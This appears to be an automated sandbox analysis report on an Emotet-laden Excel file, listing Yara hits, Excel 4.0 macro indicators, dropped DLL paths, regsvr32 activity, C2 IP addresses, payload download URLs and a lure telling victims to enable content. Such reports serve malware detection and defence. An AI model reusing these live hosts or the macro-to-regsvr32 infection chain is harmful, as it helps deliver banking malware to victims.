Source: regsvr32.exe, 00000006.00000002.693727434.00000000003A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587174139.00000000003A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://186.250.48.5/
Source: regsvr32.exe, 00000006.00000002.693727434.00000000003A2000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587174139.00000000003A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://186.250.48.5/;
Source: regsvr32.exe, 00000006.00000002.693681225.000000000034F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://186.250.48.5:80/hODqBouciZtjCAXSu
Source: regsvr32.exe, 00000006.00000002.693761609.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.587195173.00000000003E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2636759D.png

Jump to behavior

Source: unknown

DNS traffic detected: queries for: gymsportive.com

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 6_2_10007209 InternetReadFile,

6_2_10007209

Source: global traffic	HTTP traffic detected: GET /0zwe/pSiUh/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: gymsportive.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-admin/NqRYgwPERRPoTs/ HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: danialteb.comConnection: Keep-Alive

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 3_2_6DA40A17 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,

3_2_6DA40A17

E-Banking Fraud

Yara detected Emotet

Source: Yara match	File source: 4.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.230000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.regsvr32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.regsvr32.exe.10000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.426206883.0000000000140000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.420143508.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.434777664.0000000000230000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.693604509.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.694212085.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.421118824.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.427216974.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.435993356.0000000010001000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing and click Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
Source: Screenshot number: 4	Screenshot OCR: Enable Content. 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

Found malicious Excel 4.0 Macro

Source: doc_82555.xlsm	Macro extractor: Sheet: EFALGV contains: URLDownloadToFileA
Source: doc_82555.xlsm	Macro extractor: Sheet: EFALGV contains: urlmon

Office process drops PE file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\sei.ocx			Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ouyGhPOm[1].dll			Jump to dropped file

Found Excel 4.0 Macro with suspicious formulas

Source: doc_82555.xlsm	Initial sample: EXEC
Source: doc_82555.xlsm	Initial sample: EXEC

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\Windows\SysWOW64\Bvzagchljm\

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5BFE8	3_2_6DA5BFE8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5AF13	3_2_6DA5AF13
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA69F54	3_2_6DA69F54
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA6A9DC	3_2_6DA6A9DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5BBC8	3_2_6DA5BBC8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA6CB45	3_2_6DA6CB45
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA6A498	3_2_6DA6A498
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5B7BC	3_2_6DA5B7BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA646DE	3_2_6DA646DE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA6C1B0	3_2_6DA6C1B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA6B0D4	3_2_6DA6B0D4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA42386	3_2_6DA42386
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_6DA5B3E8	3_2_6DA5B3E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002110E	3_2_1002110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001D14C	3_2_1001D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000E1A9	3_2_1000E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000F1D5	3_2_1000F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000D346	3_2_1000D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100163F0	3_2_100163F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10010418	3_2_10010418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10003511	3_2_10003511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100066B0	3_2_100066B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10004700	3_2_10004700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100109F9	3_2_100109F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001EAA3	3_2_1001EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10006CBB	3_2_10006CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000BE09	3_2_1000BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10011FD0	3_2_10011FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000A01C	3_2_1000A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001F060	3_2_1001F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000508B	3_2_1000508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10010097	3_2_10010097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001112D	3_2_1001112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10009133	3_2_10009133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001C16B	3_2_1001C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10019184	3_2_10019184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001E18B	3_2_1001E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100141CF	3_2_100141CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100151E8	3_2_100151E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000B200	3_2_1000B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001B215	3_2_1001B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001F24C	3_2_1001F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002225A	3_2_1002225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10002279	3_2_10002279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100072CC	3_2_100072CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10004342	3_2_10004342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000E379	3_2_1000E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001B384	3_2_1001B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100203F2	3_2_100203F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100213FD	3_2_100213FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000F43B	3_2_1000F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10017473	3_2_10017473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10015497	3_2_10015497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001A4B5	3_2_1001A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000B4FC	3_2_1000B4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001C535	3_2_1001C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10007599	3_2_10007599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100195A8	3_2_100195A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001E612	3_2_1001E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10009617	3_2_10009617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001B687	3_2_1001B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100116AD	3_2_100116AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001D6B1	3_2_1001D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000F784	3_2_1000F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10007786	3_2_10007786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000C7D1	3_2_1000C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100147D2	3_2_100147D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100227DF	3_2_100227DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001882F	3_2_1001882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10001865	3_2_10001865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1002086F	3_2_1002086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000D899	3_2_1000D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100088E5	3_2_100088E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_100018F6	3_2_100018F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001692B	3_2_1001692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10001930	3_2_10001930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10005995	3_2_10005995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10006A8D	3_2_10006A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001DAD8	3_2_1001DAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10021AE9	3_2_10021AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001BAF2	3_2_1001BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10001B09	3_2_10001B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000BB23	3_2_1000BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000DB59	3_2_1000DB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10009B80	3_2_10009B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10004BB4	3_2_10004BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10003C51	3_2_10003C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10008C7C	3_2_10008C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10010C7C	3_2_10010C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001EC9B	3_2_1001EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10005C9A	3_2_10005C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10013CDD	3_2_10013CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10015D68	3_2_10015D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10011DA6	3_2_10011DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001DE11	3_2_1001DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10021E19	3_2_10021E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10020E6D	3_2_10020E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10004E77	3_2_10004E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1000CED8	3_2_1000CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10003F09	3_2_10003F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_10010F7A	3_2_10010F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_1001AFB0	3_2_1001AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000BE09	4_2_1000BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010418	4_2_10010418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001EAA3	4_2_1001EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100066B0	4_2_100066B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10006CBB	4_2_10006CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000B4FC	4_2_1000B4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10004700	4_2_10004700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1002110E	4_2_1002110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10003511	4_2_10003511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D346	4_2_1000D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001D14C	4_2_1001D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E1A9	4_2_1000E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10011FD0	4_2_10011FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000F1D5	4_2_1000F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100163F0	4_2_100163F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100109F9	4_2_100109F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000B200	4_2_1000B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DE11	4_2_1001DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001E612	4_2_1001E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001B215	4_2_1001B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10009617	4_2_10009617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10021E19	4_2_10021E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000A01C	4_2_1000A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001882F	4_2_1001882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000F43B	4_2_1000F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001F24C	4_2_1001F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10003C51	4_2_10003C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1002225A	4_2_1002225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001F060	4_2_1001F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10001865	4_2_10001865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1002086F	4_2_1002086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10020E6D	4_2_10020E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10017473	4_2_10017473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10004E77	4_2_10004E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10002279	4_2_10002279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10008C7C	4_2_10008C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010C7C	4_2_10010C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001B687	4_2_1001B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000508B	4_2_1000508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10006A8D	4_2_10006A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10015497	4_2_10015497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010097	4_2_10010097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000D899	4_2_1000D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001EC9B	4_2_1001EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10005C9A	4_2_10005C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100116AD	4_2_100116AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001D6B1	4_2_1001D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001A4B5	4_2_1001A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100072CC	4_2_100072CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000CED8	4_2_1000CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001DAD8	4_2_1001DAD8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10013CDD	4_2_10013CDD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100088E5	4_2_100088E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10021AE9	4_2_10021AE9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001BAF2	4_2_1001BAF2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100018F6	4_2_100018F6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10003F09	4_2_10003F09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10001B09	4_2_10001B09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000BB23	4_2_1000BB23
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001692B	4_2_1001692B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001112D	4_2_1001112D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10001930	4_2_10001930
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10009133	4_2_10009133
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001C535	4_2_1001C535
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10004342	4_2_10004342
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000DB59	4_2_1000DB59
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10015D68	4_2_10015D68
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001C16B	4_2_1001C16B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000E379	4_2_1000E379
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10010F7A	4_2_10010F7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10009B80	4_2_10009B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000F784	4_2_1000F784
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001B384	4_2_1001B384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10019184	4_2_10019184
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10007786	4_2_10007786
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001E18B	4_2_1001E18B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10005995	4_2_10005995
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10007599	4_2_10007599
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10011DA6	4_2_10011DA6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100195A8	4_2_100195A8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1001AFB0	4_2_1001AFB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_10004BB4	4_2_10004BB4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100141CF	4_2_100141CF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_1000C7D1	4_2_1000C7D1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100147D2	4_2_100147D2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100227DF	4_2_100227DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100151E8	4_2_100151E8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100203F2	4_2_100203F2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 4_2_100213FD	4_2_100213FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000BE09	5_2_1000BE09
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10010418	5_2_10010418
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001EAA3	5_2_1001EAA3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100066B0	5_2_100066B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10006CBB	5_2_10006CBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000B4FC	5_2_1000B4FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10004700	5_2_10004700
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002110E	5_2_1002110E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10003511	5_2_10003511
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000D346	5_2_1000D346
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001D14C	5_2_1001D14C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000E1A9	5_2_1000E1A9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10011FD0	5_2_10011FD0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000F1D5	5_2_1000F1D5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100163F0	5_2_100163F0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100109F9	5_2_100109F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000B200	5_2_1000B200
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001DE11	5_2_1001DE11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001E612	5_2_1001E612
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001B215	5_2_1001B215
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10009617	5_2_10009617
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10021E19	5_2_10021E19
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000A01C	5_2_1000A01C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001882F	5_2_1001882F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000F43B	5_2_1000F43B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001F24C	5_2_1001F24C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10003C51	5_2_10003C51
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002225A	5_2_1002225A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001F060	5_2_1001F060
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10001865	5_2_10001865
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1002086F	5_2_1002086F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10020E6D	5_2_10020E6D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10017473	5_2_10017473
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10004E77	5_2_10004E77
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10002279	5_2_10002279
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10008C7C	5_2_10008C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10010C7C	5_2_10010C7C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001B687	5_2_1001B687
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000508B	5_2_1000508B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10006A8D	5_2_10006A8D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10015497	5_2_10015497
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10010097	5_2_10010097
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000D899	5_2_1000D899
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001EC9B	5_2_1001EC9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_10005C9A	5_2_10005C9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100116AD	5_2_100116AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001D6B1	5_2_1001D6B1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001A4B5	5_2_1001A4B5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_100072CC	5_2_100072CC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1000CED8	5_2_1000CED8
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 5_2_1001DAD8	5_2_1001DAD8
